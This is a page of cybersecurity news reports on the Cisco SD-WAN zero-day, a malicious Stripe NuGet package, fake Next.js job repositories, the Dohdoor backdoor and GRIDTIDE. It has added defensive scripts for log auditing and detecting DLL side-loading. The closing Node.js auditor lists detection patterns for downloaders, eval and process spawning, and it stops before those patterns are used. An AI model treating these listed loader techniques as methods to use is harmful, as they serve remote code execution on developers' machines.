Tag: Cyber Threats

  • Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access

    Ravie Lakshmanan – Feb 26, 2026 – Vulnerability / Network Security

    A newly disclosed maximum-severity security flaw in Cisco Catalyst SD-WAN Controller (formerly vSmart) and Catalyst SD-WAN Manager (formerly vManage) has come under active exploitation in the wild as part of malicious activity that dates back to 2023.

    The vulnerability, tracked as CVE-2026-20127 (CVSS score: 10.0), allows an unauthenticated remote attacker to bypass authentication and obtain administrative privileges on an affected system by sending a crafted request.

    Successful exploitation of the flaw could allow the adversary to obtain elevated privileges and log in to the system as an internal, high-privileged, non-root user account.

    “This vulnerability exists because the peering authentication mechanism in an affected system is not working properly,” Cisco said in an advisory, adding the threat actor could leverage the non-root user account to access NETCONF and manipulate network configuration for the SD-WAN fabric. 

    The shortcoming affects the following deployment types, irrespective of the device configuration –

    • On-Prem Deployment
    • Cisco Hosted SD-WAN Cloud
    • Cisco Hosted SD-WAN Cloud – Cisco Managed
    • Cisco Hosted SD-WAN Cloud – FedRAMP Environment

    Cisco credited the Australian Signals Directorate’s Australian Cyber Security Centre (ASD-ACSC) for reporting the vulnerability. The networking equipment major is tracking the exploitation and subsequent post-compromise activity under the moniker UAT-8616, describing the cluster as a “highly sophisticated cyber threat actor.”

    The vulnerability has been addressed in the following versions of Cisco Catalyst SD-WAN –

    • Prior to version 20.9 – Migrate to a fixed release.
    • Version 20.9 – 20.9.8.2 (estimated release February 27, 2026)
    • Version 20.11 – 20.12.6.1
    • Version 20.12.5 – 20.12.5.3
    • Version 20.12.6 – 20.12.6.1
    • Version 20.13 – 20.15.4.2
    • Version 20.14 – 20.15.4.2
    • Version 20.15 – 20.15.4.2
    • Version 20.16 – 20.18.2.1
    • Version 20.18 – 20.18.2.1

    “Cisco Catalyst SD-WAN Controller systems that are exposed to the internet and that have ports exposed to the internet are at risk of exposure to compromise,” Cisco warned.

    The company has also recommended that customers audit the “/var/log/auth.log” file for entries containing “Accepted publickey for vmanage-admin” from unknown or unauthorized IP addresses, and check the IP addresses in auth.log against the System IPs configured in the Cisco Catalyst SD-WAN Manager web UI (WebUI > Devices > System IP).
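As an added illustration of the audit Cisco describes, and not code from Cisco or its advisory, the following Python script parses auth.log lines and reports successful public-key logins for vmanage-admin whose source IP is not in the configured System IP list. The log lines below are constructed, the script assumes the standard OpenSSH sshd syslog format for the "Accepted" line, and the System IP set stands in for the list exported from the Manager web UI path quoted above.

```python
import re
from collections import Counter

# Standard OpenSSH "Accepted <method> for <user> from <ip> port <port>" syslog line.
# Assumption: the SD-WAN auth.log uses this format.
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s[\d:]{8})\s+\S+\s+sshd\[\d+\]:\s+"
    r"Accepted\s+(?P<method>\S+)\s+for\s+(?P<user>\S+)\s+from\s+(?P<ip>\S+)"
    r"\s+port\s+(?P<port>\d+)"
)

# Constructed sample of /var/log/auth.log: two vmanage-admin key logins
# (one from a fabric System IP, one from an outside address), a password
# login for a different user, and a failed key attempt.
SAMPLE_AUTH_LOG = """\
Feb 20 03:14:22 vmanage sshd[4120]: Accepted publickey for vmanage-admin from 10.1.1.10 port 51234 ssh2: RSA SHA256:AAAA
Feb 20 03:15:01 vmanage sshd[4131]: Accepted publickey for vmanage-admin from 203.0.113.77 port 40022 ssh2: RSA SHA256:BBBB
Feb 20 03:16:40 vmanage sshd[4140]: Accepted password for admin from 192.0.2.5 port 50100 ssh2
Feb 20 03:17:09 vmanage sshd[4150]: Failed publickey for vmanage-admin from 198.51.100.9 port 41000 ssh2: RSA SHA256:CCCC
"""

# Constructed stand-in for the System IPs listed under WebUI > Devices > System IP.
SYSTEM_IPS = {"10.1.1.10", "10.1.1.11", "10.1.1.12"}


def find_unexpected_admin_logins(lines, allowed_system_ips, user="vmanage-admin"):
    """Return successful public-key logins for `user` from IPs outside the allow list."""
    allowed = set(allowed_system_ips)
    hits = []
    for line in lines:
        m = ACCEPTED_RE.search(line)
        if not m or m.group("user") != user or m.group("method") != "publickey":
            continue
        if m.group("ip") not in allowed:
            hits.append({
                "timestamp": m.group("ts"),
                "ip": m.group("ip"),
                "port": int(m.group("port")),
                "line": line.strip(),
            })
    return hits


def logins_per_ip(lines, user="vmanage-admin"):
    """Count all successful public-key logins for `user` by source IP (allowed or not)."""
    counts = Counter()
    for line in lines:
        m = ACCEPTED_RE.search(line)
        if m and m.group("user") == user and m.group("method") == "publickey":
            counts[m.group("ip")] += 1
    return dict(counts)


if __name__ == "__main__":
    for hit in find_unexpected_admin_logins(SAMPLE_AUTH_LOG.splitlines(), SYSTEM_IPS):
        print(f"REVIEW {hit['timestamp']} {hit['ip']}:{hit['port']}  {hit['line']}")
    print("logins per source IP:", logins_per_ip(SAMPLE_AUTH_LOG.splitlines()))
```

Run it against the real file with `find_unexpected_admin_logins(open("/var/log/auth.log"), system_ips)`; any hit is a login to the internal high-privileged account from an address that is not a fabric peer and deserves a closer look, while the per-IP counts help spot a legitimate peer that suddenly logs in far more often than the others.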

    According to information released by the ASD-ACSC, UAT-8616 is said to have compromised Cisco SD-WANs since 2023 via the zero-day exploit, allowing it to gain elevated access.

    “The vulnerability allowed a malicious cyber actor to create a rogue peer joined to the network management plane, or control plane, of an organization’s SD-WAN,” ASD-ACSC said. “The rogue device appears as a new but temporary, actor-controlled SD-WAN component that can conduct trusted actions within the management and control plane.”

    After successfully compromising a public-facing application, the attackers have been found to leverage the built-in update mechanism to stage a software version downgrade and escalate to the root user by exploiting CVE-2022-20775 (CVSS score: 7.8), a high-severity privilege escalation bug in the CLI of Cisco SD-WAN Software, and then restoring the software back to the version it was originally running.

    Some of the subsequent steps initiated by the threat actor are as follows –

    • Created local user accounts that mimicked other local user accounts.
    • Added a Secure Shell Protocol (SSH) authorized key for root access and modified SD-WAN-related start-up scripts to customize the environment.
    • Used Network Configuration Protocol on port 830 (NETCONF) and SSH to connect to/between Cisco SD-WAN appliances within the management plane.
    • Took steps to clear evidence of the intrusion by purging logs under “/var/log,” command history, and network connection history.

    “UAT-8616’s attempted exploitation indicates a continuing trend of the targeting of network edge devices by cyber threat actors looking to establish persistent footholds into high-value organizations, including Critical Infrastructure (CI) sectors,” Talos said.

    The development has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to add both CVE-2022-20775 and CVE-2026-20127 to its Known Exploited Vulnerabilities (KEV) catalog, mandating Federal Civilian Executive Branch (FCEB) agencies to apply the fixes within the next 24 hours.

    To check for version downgrade and unexpected reboot events, CISA recommends analyzing the following logs –

    • /var/volatile/log/vdebug
    • /var/log/tmplog/vdebug
    • /var/volatile/log/sw_script_synccdb.log 

    CISA has also issued a new emergency directive, 26-03: Mitigate Vulnerabilities in Cisco SD-WAN Systems, as part of which federal agencies are required to inventory SD-WAN devices, apply updates, and assess potential compromise.

    To that end, agencies have been ordered to provide a catalog of all in-scope SD-WAN systems on their networks by February 26, 2026, 11:59 p.m. ET. Additionally, they are required to submit a detailed inventory of all in-scope products and actions taken by March 5, 2026, 11:59 p.m. ET. Lastly, the agencies will have to submit the list of all steps taken to harden their environments by March 26, 2026, 11:59 p.m. ET.


    Source: thehackernews.com…

  • Malicious StripeApi NuGet Package Mimicked Official Library and Stole API Tokens

    Ravie Lakshmanan – Feb 26, 2026 – Malware / Software Security

    Cybersecurity researchers have disclosed details of a new malicious package discovered on the NuGet Gallery, impersonating a library from financial services firm Stripe in an attempt to target the financial sector.

    The package, codenamed StripeApi.Net, attempts to masquerade as Stripe.net, a legitimate library from Stripe that has over 75 million downloads. It was uploaded by a user named StripePayments on February 16, 2026. The package is no longer available.

    “The NuGet page for the malicious package is set up to resemble the official Stripe.net package as closely as possible,” ReversingLabs’ Petar Kirhmajer said. “It uses the same icon as the legitimate package and contains a nearly identical readme, only swapping the ‘Stripe.net’ references to read ‘Stripe-net.’”

    In a further effort to lend credibility to the typosquatted package, the threat actor behind the campaign is said to have artificially inflated the download count to more than 180,000. But in an interesting twist, the downloads were split across 506 versions, with each version recording about 300 downloads on average.

    The package replicates some of the legitimate Stripe package’s functionality, but also modifies certain critical methods to collect and transfer sensitive data, including the user’s Stripe API token, back to the threat actor. With the rest of the codebase remaining fully functional, it’s unlikely to attract any suspicion from unsuspecting developers who may have inadvertently downloaded it.

    ReversingLabs said it discovered and reported the package “relatively soon” after it was initially released, causing it to be taken down before it could inflict any serious damage.

    The software supply chain security company also noted that the activity marks a shift from prior campaigns that have leveraged bogus NuGet packages to target the cryptocurrency ecosystem and facilitate wallet key theft.

    “Developers who mistakenly download and integrate a typosquatted library like StripeAPI.net will still have their applications compile successfully and function as intended,” Kirhmajer said. “Payments would process normally and, from the developer’s perspective, nothing would appear broken. In the background, however, sensitive data is being secretly copied and exfiltrated by malicious actors.”


    Source: thehackernews.com…

  • Microsoft Warns Developers of Fake Next.js Job Repos Delivering In-Memory Malware

    A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines.

    “The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.

    The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2).

    The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1,” to trick job-seeking developers into running them as part of an assessment process.

    Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory –

    • Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. The task is configured to auto-run with the runOn: “folderOpen” option.
    • Build‑time execution during application development, where manually running the development server via “npm run dev” is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
    • Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.

    Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.

    It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.

    Attack chain overview

    “The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience,” Microsoft said. “It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration.”

    While the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a tactic that has been adopted by North Korea-linked hackers associated with a long-running campaign known as Contagious Interview.

    The end goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and credentials, that can provide opportunities to pivot deeper into the target network.

    Using GitHub gists in VS Code tasks.json instead of Vercel URLs

    In a report published Wednesday, Abstract Security said it has observed a shift in threat actor tactics, notably a spike in alternative staging servers used in the VS Code tasks commands instead of Vercel URLs. This includes the use of scripts hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and run next-stage payloads. An alternative approach employs URL shorteners like short[.]gy to conceal Vercel URLs.

    The cybersecurity company said it also identified a malicious npm package linked to the campaign named “eslint-validator” that retrieves and runs an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware referred to as BeaverTail.

    Furthermore, a malicious VS Code task embedded within a GitHub repository has been found to initiate a Windows-only infection chain that runs a batch script to download Node.js runtime on the host (if it does not exist) and leverage the certutil program to parse a code block contained within the script. The decoded script is then executed with the previously obtained Node.js runtime to deploy a Python malware protected with PyArmor.

    Cybersecurity company Red Asgard, which has also been extensively tracking the campaign, said the threat actors have leveraged crafted VS Code projects that use the runOn: “folderOpen” trigger to deploy malware that, in turn, queries the Polygon blockchain to retrieve JavaScript stored within an NFT contract for improved resilience. The final payload is an information stealer that harvests credentials and data from web browsers, cryptocurrency wallets, and password managers.

    Distribution of staging infrastructure used by North Korean threat actors in 2025

    “This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded.

    To counter the threat, the company is recommending that organizations harden developer workflow trust boundaries, enforce strong authentication and conditional access, maintain strict credential hygiene, apply the principle of least privilege to developer accounts and build identities, and separate build infrastructure where feasible. 

    The development comes as GitLab said it banned 131 unique accounts that were engaged in distributing malicious code projects linked to the Contagious Interview campaign and the fraudulent IT worker scheme known as Wagemole.

    “Threat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however, they also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses,” GitLab’s Oliver Smith said. “Threat actors created accounts using Gmail email addresses in almost 90% of cases.”

    In more than 80% of the cases, per the software development platform, the threat actors are said to have leveraged at least six legitimate services to host malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most commonly used, with the threat actors relying on the web development platform no less than 49 times in 2025.

    “In December, we observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or executing a custom script to decode malware from binary data in a fake font file,” Smith added, corroborating the aforementioned findings from Microsoft.

    Assessed organization chart of the North Korean IT worker cell

    Also discovered by GitLab was a private project “almost certainly” controlled by a North Korean national managing a North Korean IT worker cell that contained detailed financial and personnel records showing earnings of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking quarterly income performance for individual team members.

    “Records demonstrate that these operations function as structured enterprises with defined targets and operating procedures and close hierarchical oversight,” GitLab noted. “This cell’s demonstrated ability to cultivate facilitators globally provides a high degree of operational resiliency and money laundering flexibility.”

    A GitHub account associated with a North Korean IT worker

    In a report published earlier this month, Okta said the “vast majority” of interviews with IT workers do not progress to a second interview or job offer, but noted they are “learning from their mistakes” and that a large number of them seek temporary contract work as software developers hired out to third-party companies to take advantage of the fact that they are unlikely to enforce rigorous background checks.

    “Some actors however seem to be more competent at crafting personas and passing screening interviews,” it added. “A kind of IT Worker natural selection is at play. The most successful actors are very prolific, and scheduled hundreds of interviews each.”


    Source: thehackernews.com…

  • Expert Recommends: Prepare for PQC Right Now

    Introduction: Steal It Today, Break It in a Decade
    Digital evolution is unstoppable, and though the pace may vary, things tend to fall into place sooner rather than later. That, of course, applies to adversaries as well. The rise of ransomware and cyber extortion generated funding for a complex and highly professional criminal ecosystem. The era of the cloud brought general availability of


    Source: thehackernews.com…

  • ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit & 15+ Stories

    Ravie Lakshmanan – Feb 26, 2026 – Cybersecurity / Hacking News

    Nothing here looks dramatic at first glance. That’s the point. Many of this week’s threats begin with something ordinary, like an ad, a meeting invite, or a software update.

    Behind the scenes, the tactics are sharper. Access happens faster. Control is established sooner. Cleanup becomes harder.

    Here is a quick look at the signals worth paying attention to.

    1. Breakout times shrink

      In its 2026 Global Threat Report, CrowdStrike said adversaries became faster than ever before in 2025. “The average e-crime breakout time — the period between initial access and lateral movement onto another system — dropped to 29 minutes, a 65% increase in speed from 2024,” the company said. One such intrusion undertaken by Luna Moth (aka Chatty Spider) targeting a law firm moved from initial access to data exfiltration in four minutes. Chief among the factors fueling this dramatic acceleration was the widespread abuse of legitimate credentials, which allowed attackers to blend into normal network traffic and bypass many traditional security controls. This was coupled with threat actors of varied motivations utilizing AI technology to accelerate and optimize their existing techniques. Some of the threat actors that have leveraged AI in their operations include Fancy Bear, Punk Spider (aka Akira), Blind Spider (aka Blind Eagle), Odyssey Spider (aka TA558), and an India-nexus hacking group called Frantic Tiger that has used Netlify and Cloudflare pages for credential-harvesting operations. The cybersecurity company said it observed an 89% increase in the number of attacks by AI-enabled adversaries compared to 2024 and a 42% year-over-year increase in zero-days exploited prior to public disclosure. In tandem, 67% of vulnerabilities exploited by China-nexus adversaries provided immediate system access, and 40% targeted edge devices that typically lack comprehensive monitoring. The vast majority of attacks, 82%, were free of malware — highlighting attackers’ enduring shift toward hands-on-keyboard operations and the abuse of legitimate tools and credentials.

    These stories may seem separate, but they point in the same direction. Speed is increasing. Deception is improving. And attackers are finding new ways to blend into everyday activity.

    The warning signs are there for those who look closely. Small gaps, delayed patches, misplaced trust, and rushed clicks still make the biggest difference.

    Staying aware of these shifts is no longer optional. The details change each week. The pressure does not.


    Source: thehackernews.com…

  • UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor

    Ravie Lakshmanan – Feb 26, 2026 – Malware / Threat Intelligence

    A previously undocumented threat activity cluster has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025.

    The campaign is being tracked by Cisco Talos under the moniker UAT-10027. The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor.

    “Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively,” security researchers Alex Karkins and Chetan Raghuprasad said in a technical report shared with The Hacker News.

    Although the initial access vector used in the campaign is currently not known, it’s suspected to involve the use of social engineering phishing techniques, leading to the execution of a PowerShell script.

    The script then proceeds to download and run a Windows batch script from a remote staging server, which, for its part, facilitates the download of a malicious Windows dynamic-link library (DLL) that’s named “propsys.dll” or “batmeter.dll.”

    The DLL payload – i.e., Dohdoor – is launched by means of a legitimate Windows executable (e.g., “Fondue.exe,” “mblctr.exe,” and “ScreenClippingHost.exe”) using a technique referred to as DLL side-loading. The backdoor access created by the implant is used to retrieve a next-stage payload directly into the victim’s memory and execute it. The payload is assessed to be a Cobalt Strike Beacon.
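To show how the side-loading step described above can be surfaced from endpoint telemetry, here is an added Python example that is not Talos tooling: it classifies image-load records (for instance the process image and loaded DLL fields of a Sysmon Event ID 7 entry) and flags propsys.dll or batmeter.dll loading from outside the Windows system directories, weighting the finding when the host process is one of the signed executables Talos names. The records are constructed, and the directory prefixes, severity labels, and the assumption that the system drive is C: are this example’s own.

```python
import ntpath

# Lower-case prefixes of the directories where propsys.dll / batmeter.dll legitimately live.
# Assumption: default install drive C:.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

# DLL names the report says the payload is given; both are genuine Windows DLLs.
SYSTEM_DLLS = {"propsys.dll", "batmeter.dll"}

# Signed Windows executables the report names as side-loading hosts.
KNOWN_HOSTS = {"fondue.exe", "mblctr.exe", "screenclippinghost.exe"}

# Constructed (process image, loaded image) pairs, as a Sysmon Event ID 7 record would carry.
SAMPLE_IMAGE_LOADS = [
    # Normal: a Windows binary loading the real DLL from System32.
    ("C:\\Windows\\System32\\Fondue.exe", "C:\\Windows\\System32\\propsys.dll"),
    # Suspicious: a copy of Fondue.exe in a temp folder loading a propsys.dll sitting beside it.
    ("C:\\Users\\jdoe\\AppData\\Local\\Temp\\upd\\Fondue.exe",
     "C:\\Users\\jdoe\\AppData\\Local\\Temp\\upd\\propsys.dll"),
    # Worth a look: an unrelated program loading a batmeter.dll from its own directory.
    ("C:\\Program Files\\Vendor\\app.exe", "C:\\Program Files\\Vendor\\batmeter.dll"),
    # Normal: mblctr.exe loading the real batmeter.dll.
    ("C:\\Windows\\System32\\mblctr.exe", "C:\\Windows\\System32\\batmeter.dll"),
]


def _in_system_dir(path):
    p = path.lower()
    return any(p.startswith(d) for d in SYSTEM_DIRS)


def classify_image_load(process_image, loaded_image):
    """Return a finding dict for a suspicious load of a watched DLL, or None if it looks normal."""
    dll = ntpath.basename(loaded_image).lower()
    host = ntpath.basename(process_image).lower()
    if dll not in SYSTEM_DLLS or _in_system_dir(loaded_image):
        return None
    reasons = [f"{dll} loaded from outside the system directories: {loaded_image}"]
    if host in KNOWN_HOSTS:
        reasons.append(f"{host} is one of the signed executables reported as a side-loading host")
    if not _in_system_dir(process_image):
        reasons.append(f"host executable runs from {ntpath.dirname(process_image)}")
    if ntpath.dirname(loaded_image).lower() == ntpath.dirname(process_image).lower():
        reasons.append("DLL sits beside the host executable (search-order hijack pattern)")
    severity = "high" if host in KNOWN_HOSTS else "medium"
    return {"severity": severity, "process": process_image, "dll": loaded_image, "reasons": reasons}


def scan_image_loads(records):
    """Classify every record and keep only the findings."""
    return [f for f in (classify_image_load(p, d) for p, d in records) if f]


if __name__ == "__main__":
    for finding in scan_image_loads(SAMPLE_IMAGE_LOADS):
        print(finding["severity"].upper(), finding["process"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The same shape of check extends naturally to any DLL name that should only ever load from System32; the list of watched DLLs and host binaries is the part a detection engineer would keep in a maintained allow/watch list rather than in code.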

    “The threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address,” Talos said. 

    “This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, ensuring that the malware’s C2 communications remain stealth by traditional network security infrastructure.”

    Dohdoor has also been found to unhook system calls to bypass endpoint detection and response (EDR) solutions that monitor Windows API calls through user-mode hooks in NTDLL.dll.

    There is currently no clarity on who is behind UAT-10027, but Cisco Talos said it found some tactical similarities between Dohdoor and Lazarloader, a downloader previously identified as used by the North Korean hacking group Lazarus in attacks aimed at South Korea.

    “While UAT-10027’s malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting,” Talos concluded.

    “However, […] North Korean APT actors have targeted the healthcare sector using Maui ransomware, and another North Korean APT group, Kimsuky, has targeted the education sector, highlighting the overlaps in the victimology of UAT-10027 with that of other North Korean APTs.”


    Source: thehackernews.com…

  • Google Disrupts UNC2814 GRIDTIDE Campaign After 53 Breaches Across 42 Countries

    Ravie Lakshmanan – Feb 25, 2026 – Cyber Espionage / Network Security

    Google on Wednesday disclosed that it worked with industry partners to disrupt the infrastructure of a suspected China-nexus cyber espionage group tracked as UNC2814 that breached at least 53 organizations across 42 countries.

    “This prolific, elusive actor has a long history of targeting international governments and global telecommunications organizations across Africa, Asia, and the Americas,” Google Threat Intelligence Group (GTIG) and Mandiant said in a report published today.

    UNC2814 is also suspected to be linked to additional infections in more than 20 other nations. The threat actor, which the tech giant has been tracking since 2017, has been observed using API calls to communicate with software-as-a-service (SaaS) apps as command-and-control (C2) infrastructure. The idea, it added, is to disguise their malicious traffic as benign.

    Central to the hacking group’s operations is a novel backdoor dubbed GRIDTIDE that abuses Google Sheets API as a communication channel to disguise C2 traffic and facilitate the transfer of raw data and shell commands. It’s a C-based malware that supports file upload/download and the execution of arbitrary shell commands.

    Exactly how UNC2814 obtains initial access remains a topic of investigation, but the group is said to have a history of exploiting and compromising web servers and edge systems.

    Attacks mounted by the threat actor have leveraged a service account to move laterally within the environment via SSH. Also put to use are living-off-the-land (LotL) binaries to conduct reconnaissance, escalate privileges, and set up persistence for the backdoor.

    “To achieve persistence, the threat actor created a service for the malware at /etc/systemd/system/xapt.service, and once enabled, a new instance of the malware was spawned from /usr/sbin/xapt,” Google explained.

    Another noteworthy aspect is the deployment of SoftEther VPN Bridge to establish an outbound encrypted connection to an external IP address. It’s worth mentioning here that the abuse of SoftEther VPN has been linked to multiple Chinese hacking groups.

    There is evidence indicating that GRIDTIDE is dropped on endpoints containing personally identifiable information (PII), an aspect that’s consistent with cyber espionage activity focused on monitoring persons of interest. Google, however, noted that it did not observe any data exfiltration taking place during the course of the campaign.

    GRIDTIDE execution lifecycle

    GRIDTIDE’s C2 mechanism involves a cell-based polling mechanism, where specific roles are assigned to certain spreadsheet cells to enable bidirectional communication –

    • A1, to poll for attacker commands and overwrite it with a status response (e.g., S-C-R or Server-Command-Success)
    • A2-An, to transfer data, such as command output and files
    • V1, to store system data from the victim endpoint

    As part of the action, Google said it terminated all Google Cloud Projects controlled by the attacker, disabled all known UNC2814 infrastructure, and cut off access to attacker-controlled accounts and Google Sheets API calls leveraged by the actor for command-and-control (C2) purposes.

    The tech giant described UNC2814 as one of the “most far-reaching, impactful campaigns” encountered in recent years, adding that it has issued formal victim notifications to each of the targets and that it is actively supporting organizations with verified compromises resulting from this threat.

    The latest discovery is one of many concurrent efforts by Chinese nation-state groups to embed themselves into networks for long-term access. The development also highlights that the network edge continues to take the brunt of internet-wide exploitation attempts, with threat actors frequently exploiting vulnerabilities and misconfigurations in such appliances as a common entry point into enterprise networks.

    These appliances have become attractive targets in recent years as they typically lack endpoint malware detection, yet provide direct network access or pivot points to internal services if compromised.

    “The global scope of UNC2814’s activity, evidenced by confirmed or suspected operations in over 70 countries, underscores the serious threat facing telecommunications and government sectors, and the capacity for these intrusions to evade detection by defenders,” Google said.

    “Prolific intrusions of this scale are generally the result of years of focused effort and will not be easily re-established. We expect that UNC2814 will work hard to re-establish its global footprint.”


    Source: thehackernews.com…

  • Malicious Next.js Repos Target Developers Via Fake Job Interviews

    Attackers are targeting developers with malicious Next.js repositories to perform remote code execution (RCE) and establish a persistent command-and-control (C2) channel on infected machines in a campaign tied to North Korea’s fake job-recruitment scams.

    Microsoft sounded the alarm on the activity, which delivers malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender Experts and the Microsoft Defender Security Research Team discovered various Trojanized repositories that offered different execution paths for delivery of a backdoor to compromise developer systems.

    “The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control,” according to a blog post published Tuesday by the two Microsoft security teams. 

    Without specifically attributing the campaign to North Korea, the researchers noted that the activity “aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” a cluster associated with North Korea’s Lazarus APT. The blog post also includes links to third-party research earlier this year about North Korean APT activity tied to Microsoft Visual Studio Code. Indeed, North Korean actors for years have been persistently targeting developers by dangling job opportunities that, as part of a fake job interview, ask them to participate in sample development challenges that deliver malicious code to their machines.

    “This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” the blog post stated.

    The ultimate objective of the campaign is to gain execution on developer systems that often contain high‑value assets such as source code, environment secrets, and access to build or cloud resources, according to Microsoft. The campaign once again demonstrates how developer workflows are a primary attack surface for cyber espionage and other activity that can lead to further compromise of the entire software supply chain, according to the researchers.

    Repositories Leading to Backdoor Activity

    The researchers discovered the campaign recently when Microsoft Defender flagged suspicious outbound connections from Node.js processes to attacker-controlled infrastructure, eventually tracking the activity to Next.js repositories all exhibiting the same malicious behavior. Next.js is a widely used open source Web development framework maintained by cloud software vendor Vercel.


    The malicious repositories initiate one of two execution paths that deliver a lightweight registration stage to establish host identity as well as bootstrap code. These eventually lead to runtime retrieval and in-memory invocation of attacker-controlled JavaScript that turns into a persistent C2 connection for delivering further payloads and exfiltrating data from infected systems.

    Some repositories abuse Visual Studio Code workspace automation: they ship a .vscode/tasks.json whose task is configured (via runOptions.runOn set to folderOpen) to execute automatically once the workspace is opened and trusted, triggering a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious logic directly in development assets, so that when a developer runs a standard build command or starts the development server, the disguised code decodes itself and fetches additional payloads.
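    The auto-run task is the piece a reviewer can check mechanically before opening a cloned repository in the IDE. The following Node.js script is an added example (not code from Microsoft's write-up or from any repository in the campaign): it parses a .vscode/tasks.json, which is JSONC rather than strict JSON, and flags tasks that run on folder open and whose command line pulls or evaluates remote code. The tasks.json samples embedded in it are constructed, and loader.example.invalid is a placeholder, not an indicator from the campaign.

```javascript
"use strict";

// Added example, not code from Microsoft's or Dark Reading's write-up.
// Audits a repository's .vscode/tasks.json for tasks VS Code launches on
// folder open (runOptions.runOn = "folderOpen") whose command line fetches
// and executes remote code through Node.js. Inputs below are constructed;
// loader.example.invalid is a placeholder, not an indicator from the campaign.

// tasks.json is JSONC: comments and trailing commas are allowed, so plain
// JSON.parse fails on exactly the files we want to read. Strip comments
// outside strings, then drop trailing commas before objects/arrays close.
function parseJsonc(text) {
  let out = "", inStr = false, i = 0;
  while (i < text.length) {
    const c = text[i], n = text[i + 1];
    if (inStr) {
      out += c;
      if (c === "\\") { out += n ?? ""; i += 2; continue; } // keep escaped char verbatim
      if (c === '"') inStr = false;
      i++; continue;
    }
    if (c === '"') { inStr = true; out += c; i++; continue; }
    if (c === "/" && n === "/") { while (i < text.length && text[i] !== "\n") i++; continue; }
    if (c === "/" && n === "*") { const e = text.indexOf("*/", i + 2); i = e < 0 ? text.length : e + 2; continue; }
    out += c; i++;
  }
  return JSON.parse(out.replace(/,(\s*[}\]])/g, "$1"));
}

// Command-line fragments typical of a fetch-and-execute loader.
const LOADER_PATTERNS = [
  [/\bnode\b.*\s(?:-e|--eval)\b/, "inline node script"],
  [/\b(?:curl|wget|Invoke-WebRequest|iwr)\b/i, "downloader"],
  [/https?:\/\//i, "remote URL"],
  [/\b(?:eval|new Function|vm\.runIn\w*Context)\b/, "dynamic code evaluation"],
  [/\bchild_process\b|\bexecSync\b|\bspawn(?:Sync)?\b/, "process spawn"],
  [/\bBuffer\.from\(.*base64/i, "base64 staging"],
];

// Flatten command and args, including per-OS overrides (task.windows /
// task.linux / task.osx), into one string. Args may be {value, quoting} objects.
function commandLine(task) {
  const parts = [];
  for (const scope of [task, task.windows, task.linux, task.osx]) {
    if (!scope) continue;
    if (scope.command) parts.push(String(scope.command));
    for (const a of scope.args || []) parts.push(typeof a === "string" ? a : String(a.value ?? ""));
  }
  return parts.join(" ");
}

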